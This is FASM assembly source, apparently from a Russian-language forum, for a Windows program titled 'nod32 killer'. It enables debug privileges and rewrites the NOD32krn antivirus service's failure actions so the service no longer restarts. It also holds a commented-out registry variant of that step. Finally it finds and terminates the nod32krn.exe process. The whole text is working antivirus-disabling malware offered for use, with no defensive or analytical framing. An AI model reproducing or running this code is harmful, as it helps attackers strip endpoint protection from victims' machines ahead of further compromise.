Код:
; --------------------------------------------------------------------------------------
; nod32 killer
; Created by Ct757
; --------------------------------------------------------------------------------------
format PE GUI 4.0
entry start
include '%fasminc%\win32a.inc'
section '.main' code readable writeable executable
SC_MANAGER_ALL_ACCESS = 0x000F003F
SERVICE_ALL_ACCESS = 0x000F01FF
SERVICE_CONFIG_FAILURE_ACTIONS = 2
SERVICE_CONTROL_STATUS_REASON_INFO = 1
; szNODService db 'SYSTEM\CurrentControlSet\Services\NOD32krn',0
; szFailureActions db 'FailureActions',0
szNODExeFile db 'nod32krn.exe',0
szSeDebugPrivilege db 'SeDebugPrivilege',0
szNODSvcName db 'NOD32krn',0
; hKey dd ?
hSCM dd ?
hSvc dd ?
hSnap dd ?
hToken dd ?
ReturnLength dd ?
align 0x10
tkp: ; struct TOKEN_PRIVILEGES
.PrivilegeCount dd ?
.LowPart dd ?
.HighPart dd ?
.Attributes dd ?
PrivLUID: ; struct LUID
.LowPart dd ?
.HighPart dd ?
sfa: ; struct SERVICE_FAILURE_ACTIONS
.dwResetPeriod dd -1
.lpRebootMsg dd 0
.lpCommand dd 0
.cActions dd 3
.lpsaActions dd act
act db (2*4*3) dup (0) ; array of 3 SC_ACTION structs
p_ent: ; struct PROCESSENTRY32
.dwSize dd p_ent_size
.cntUsage dd ?
.th32ProcessID dd ?
.th32DefaultHeapID dd ?
.th32ModuleID dd ?
.cntThreads dd ?
.th32ParentProcessID dd ?
.pcPriClassBase dd ?
.dwFlags dd ?
.szExeFile db 260 dup(?)
p_ent_size = $ - p_ent
start:
; --------------------------------------------------------------------------------------
; Получение отладочных привилегий:
invoke OpenProcessToken,-1,0x0028,hToken
invoke LookupPrivilegeValue,0,szSeDebugPrivilege,PrivLUID
test eax,eax
je close_token
push [PrivLUID.LowPart]
pop [tkp.LowPart]
push [PrivLUID.HighPart]
pop [tkp.HighPart]
mov [tkp.Attributes],2 ; SE_PRIVILEGE_ENABLED
mov [tkp.PrivilegeCount],1
invoke AdjustTokenPrivileges,[hToken],FALSE,tkp,0x10,tkp,ReturnLength
close_token:
invoke CloseHandle,[hToken]
; --------------------------------------------------------------------------------------
; --------------------------------------------------------------------------------------
; Отключение восстановления сервиса через SCM:
invoke OpenSCManager,0,0,SC_MANAGER_ALL_ACCESS
test eax,eax
je exit
mov [hSCM],eax
invoke OpenService,eax,szNODSvcName,SERVICE_ALL_ACCESS
test eax,eax
je close_scm
mov [hSvc],eax
invoke ChangeServiceConfig2,eax,SERVICE_CONFIG_FAILURE_ACTIONS,sfa
invoke CloseServiceHandle,[hSvc]
close_scm:
invoke CloseServiceHandle,[hSCM]
; --------------------------------------------------------------------------------------
; --------------------------------------------------------------------------------------
; Вариант отключения восстановления напрямую через реестр:
;
; invoke RegOpenKeyEx,HKEY_LOCAL_MACHINE,szNODService,0,KEY_SET_VALUE,hKey
; test eax,eax
; jne exit
;
; invoke RegDeleteValue,[hKey],szFailureActions
;
; invoke RegCloseKey,[hKey]
;
; --------------------------------------------------------------------------------------
; --------------------------------------------------------------------------------------
; Поиск и завершение процесса:
find_nod32_pid:
invoke CreateToolhelp32Snapshot,2,0
inc eax
je exit
dec eax
mov [hSnap],eax
invoke Process32First,eax,p_ent
test eax,eax
je close_snap
check_process:
invoke lstrcmpi,p_ent.szExeFile,szNODExeFile
test eax,eax
jne next_process
invoke OpenProcess,PROCESS_TERMINATE,FALSE,[p_ent.th32ProcessID]
test eax,eax
je next_process
xchg eax,ebx
invoke TerminateProcess,ebx,0
invoke CloseHandle,ebx
next_process:
invoke Process32Next,[hSnap],p_ent
test eax,eax
jne check_process
close_snap:
invoke CloseHandle,[hSnap]
; --------------------------------------------------------------------------------------
exit:
invoke ExitProcess,0
section '.idata' import data readable writeable
library kernel32, 'KERNEL32.DLL',\
user32, 'USER32.DLL',\
advapi32, 'ADVAPI32.DLL'
include '%fasminc%\APIA\kernel32.inc'
include '%fasminc%\APIA\user32.inc'
include '%fasminc%\APIA\advapi32.inc'